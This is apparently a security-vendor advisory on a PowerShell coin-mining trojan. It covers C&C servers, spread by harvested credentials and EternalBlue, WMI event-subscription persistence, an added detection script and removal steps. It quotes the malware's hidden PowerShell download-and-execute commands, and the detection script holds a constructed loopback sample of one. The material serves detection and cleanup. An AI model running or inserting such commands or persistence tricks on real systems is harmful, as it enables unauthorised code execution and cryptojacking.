TROJ_POWLOAD.COINM
Trojan.PowerShell.Agent.N (Bitdefender)
Windows
Threat Type: Trojan
Destructiveness: No
Encrypted: Yes
In the wild: Yes
OVERVIEW
Infection Channel: Downloaded from the Internet, Dropped by other malware
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
It connects to certain URLs. It may do this to remotely inform a malicious user of its installation. It may also do this to download possibly malicious files onto the computer, which puts the computer at a greater risk of infection by other threats.
TECHNICAL DETAILS
File Size: 3,766,940 bytes
File Type: PS1
Memory Resident: Yes
Initial Samples Received Date: 11 Dec 2017
Payload: Connects to URLs/IPs, Deletes files
Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Download Routine
This Trojan connects to the following malicious URLs (its C&C servers):
- http://{BLOCKED}7.{BLOCKED}9.67.243:8000
- http://{BLOCKED}2.{BLOCKED}7.116.8:8000
- http://{BLOCKED}8.{BLOCKED}4.48.95:8000
NOTES:
If the affected machine is 64-bit, it downloads and executes the following script from the accessed C&C server:
- http://{C&C Address}/in6.ps1
It also creates a custom WMI class with the following name in the root\default namespace (the removal step for it is given under SOLUTION):
- Office_Updater
It performs coin mining by connecting to one of the following mining pools, passing the miner the following arguments:
- -o {URL of mining server} -u {username for mining server} -p {password for mining server}
{username for mining server} = 49WZduVQ1DFWG3scZxFT8hBY1JsoYuJVqMRe8UAiYzc2WmGbN7yFDmmc2GZzrAv6GkY24hR7imhNaWME9wEKWPGF3h2FXQB
{password for mining server} = x
{URL of mining server} =
- stratum+tcp://{BLOCKED}1.{BLOCKED}ol.org:14444
- stratum+tcp://{BLOCKED}2.{BLOCKED}ol.org:14444
- stratum+tcp://{BLOCKED}-east1.{BLOCKED}ol.org:14444
- stratum+tcp://{BLOCKED}-west1.{BLOCKED}ol.org:14444
- stratum+tcp://{BLOCKED}ia1.{BLOCKED}ol.org:14444
- stratum+tcp://{BLOCKED}e.{BLOCKED}pool.com:80
- stratum+tcp://{BLOCKED}e.{BLOCKED}l.net:80
It scans the network for other reachable hosts.
It tries to authenticate to each discovered host with the credentials it harvested from the affected machine. If authentication succeeds, it runs a PowerShell command on that host that downloads and executes one of the following URLs:
- http://{BLOCKED}7.{BLOCKED}9.67.243:8000/in6.ps1 - if the target host runs a 64-bit operating system
- http://{BLOCKED}2.{BLOCKED}7.116.8:8000/in6.ps1 - if the target host runs a 64-bit operating system
- http://{BLOCKED}8.{BLOCKED}4.48.95:8000/in6.ps1 - if the target host runs a 64-bit operating system
- http://{BLOCKED}7.{BLOCKED}9.67.243:8000/in3.ps1 - if the target host runs a 32-bit operating system
- http://{BLOCKED}2.{BLOCKED}7.116.8:8000/in3.ps1 - if the target host runs a 32-bit operating system
- http://{BLOCKED}8.{BLOCKED}4.48.95:8000/in3.ps1 - if the target host runs a 32-bit operating system
If a host cannot be accessed with the credentials harvested by Mimikatz, it attempts the EternalBlue (MS17-010) SMB exploit against it.
Once the exploit succeeds, the shellcode runs the following command on the vulnerable machine. The command first lists the WMI filter-to-consumer bindings in root\Subscription and only downloads the next-stage script if no binding whose name contains "SCM Event Logs" already exists, so an already-infected host is not re-infected:
- cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Logs')))) {IEX(New-Object Net.WebClient).DownloadString('http://{BLOCKED}7.{BLOCKED}9.67.243:8000/ma3.ps1 ')}" - for 32-bit operating systems
- cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Logs')))) {IEX(New-Object Net.WebClient).DownloadString('http://{BLOCKED}7.{BLOCKED}9.67.243:8000/ma6.ps1 ')}" - for 64-bit operating systems
It creates the following WMI objects in the root\Subscription namespace to enable its automatic execution (a permanent WMI event subscription; the filter and consumer are named "SCM Event Logs Filter" and "SCM Event Logs Consumer", which are the names checked by the infection command above and removed in the SOLUTION steps):
- __EventFilter
- CommandLineEventConsumer
- __FilterToConsumerBinding
The command line it registers for execution is:
- powershell.exe -NoP -NonI -W Hidden -E {encoded script}
Other artifacts associated with this Trojan:
- yastcat
- %User Temp%\y1.bat
It changes the following power settings, which keeps the affected machine awake for mining:
- Standby timeout to 0 minutes
- Hibernate timeout to 0 minutes
- Set lid close action/pushing power button to do nothing
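The following PowerShell script is an added example for this page, not Trend Micro tooling and not the malware's own code. It enumerates every permanent WMI event subscription in root\Subscription, resolves each binding to its filter query and consumer command line, decodes the base64 UTF-16LE payload behind any -E/-EncodedCommand switch, and flags bindings whose names contain "SCM Event Logs" or whose command line matches the hidden-window/encoded-script pattern listed above. It also reports whether the root\default:Office_Updater class exists. The suspect names come from this page; the sample command line near the bottom is constructed (with a loopback URL) purely so the decoder can be exercised offline. Run it in an elevated PowerShell prompt.

```powershell
# Added example (not Trend Micro's tooling, not the malware's code): inspect permanent
# WMI event subscriptions for the TROJ_POWLOAD.COINM persistence described on this page.

function Get-DecodedEncodedCommand {
    # powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
    # Pull the base64 argument that follows it and decode it as UTF-16LE; $null if absent.
    param([string]$CommandLine)
    if ($CommandLine -match '(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{8,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }
    }
    return $null
}

function Find-WmiSubscriptionPersistence {
    # One object per __FilterToConsumerBinding in root\subscription, with the resolved
    # filter query, consumer class and command line, the decoded payload, and a flag.
    param([string[]]$SuspectNames = @('SCM Event Logs'))   # names taken from this page
    $ns = 'root\subscription'
    # Querying the abstract base class __EventConsumer returns every concrete consumer type.
    $filters   = @{}
    Get-CimInstance -Namespace $ns -ClassName __EventFilter   -ErrorAction SilentlyContinue | ForEach-Object { $filters[$_.Name]   = $_ }
    $consumers = @{}
    Get-CimInstance -Namespace $ns -ClassName __EventConsumer -ErrorAction SilentlyContinue | ForEach-Object { $consumers[$_.Name] = $_ }

    $results = foreach ($b in (Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue)) {
        # Filter and Consumer are object references; the reference carries the key (Name).
        $f = $filters[$b.Filter.Name]
        $c = $consumers[$b.Consumer.Name]
        $cmd = $null
        if ($c -and $c.CimClass.CimClassName -eq 'CommandLineEventConsumer') { $cmd = $c.CommandLineTemplate }
        $decoded = if ($cmd) { Get-DecodedEncodedCommand $cmd } else { $null }

        $names = @($b.Filter.Name, $b.Consumer.Name) -join ' '
        $suspicious = (@($SuspectNames | Where-Object { $names -like "*$_*" }).Count -gt 0) -or
                      ($cmd -match '(?i)powershell.*(-w\w*\s+hidden|-e[a-z]*\s)') -or
                      ($decoded -match '(?i)(IEX|Invoke-Expression|DownloadString)')

        [pscustomobject]@{
            FilterName     = $b.Filter.Name
            FilterQuery    = if ($f) { $f.Query } else { '<unresolved>' }
            ConsumerName   = $b.Consumer.Name
            ConsumerClass  = if ($c) { $c.CimClass.CimClassName } else { '<unresolved>' }
            CommandLine    = $cmd
            DecodedCommand = $decoded
            Suspicious     = [bool]$suspicious
        }
    }
    return @($results)
}

function Test-OfficeUpdaterClass {
    # This page lists a custom class root\default:Office_Updater; report whether it exists.
    $cls = Get-CimClass -Namespace 'root\default' -ClassName 'Office_Updater' -ErrorAction SilentlyContinue
    return [bool]$cls
}

# --- Offline demo of the decoder on a CONSTRUCTED consumer command line ------------------
$payload = "IEX(New-Object Net.WebClient).DownloadString('http://127.0.0.1:8000/ma6.ps1')"  # constructed, loopback, not the real C&C
$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$sampleTemplate = "powershell.exe -NoP -NonI -W Hidden -E $b64"
"Decoded sample: " + (Get-DecodedEncodedCommand $sampleTemplate)

# --- Live check of this host -------------------------------------------------------------
Find-WmiSubscriptionPersistence | Format-List
if (Test-OfficeUpdaterClass) { Write-Warning 'root\default:Office_Updater class is present' }
```

A clean host normally shows no bindings at all in root\subscription, or only ones with a recognisable filter query and consumer (some management agents register their own); any binding whose consumer launches a hidden PowerShell with an encoded or remotely downloaded script deserves a look regardless of name, since the "SCM Event Logs" label is only the name this family happened to use.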
SOLUTION
Minimum Scan Engine: 9.850
First VSAPI Pattern File: 13.836.07
First VSAPI Pattern Release Date: 11 Dec 2017
VSAPI OPR Pattern Version: 13.837.00
VSAPI OPR Pattern Release Date: 12 Dec 2017
Step 1
Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.
Step 2
Scan your computer with your Trend Micro product to delete files detected as TROJ_POWLOAD.COINM. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files.
NOTES:
Restore the power configuration (standby and hibernate timeouts, lid close and power button actions) in Control Panel or with powercfg according to user preference.
Run the following in an elevated PowerShell prompt to remove the created WMI instances and class. Run them in PowerShell, not cmd.exe: from a command prompt the pipe would be consumed by cmd, so each line would have to be wrapped as powershell.exe -Command "...":
- Get-WmiObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs Filter'" | Remove-WmiObject
- Get-WmiObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM Event Logs Consumer'" | Remove-WmiObject
- Get-WmiObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%SCM Event Logs Consumer%'" | Remove-WmiObject
- ([WmiClass]'root\default:Office_Updater') | Remove-WmiObject
Re-run the Get-WmiObject half of each line afterwards; it should return nothing once the objects are gone.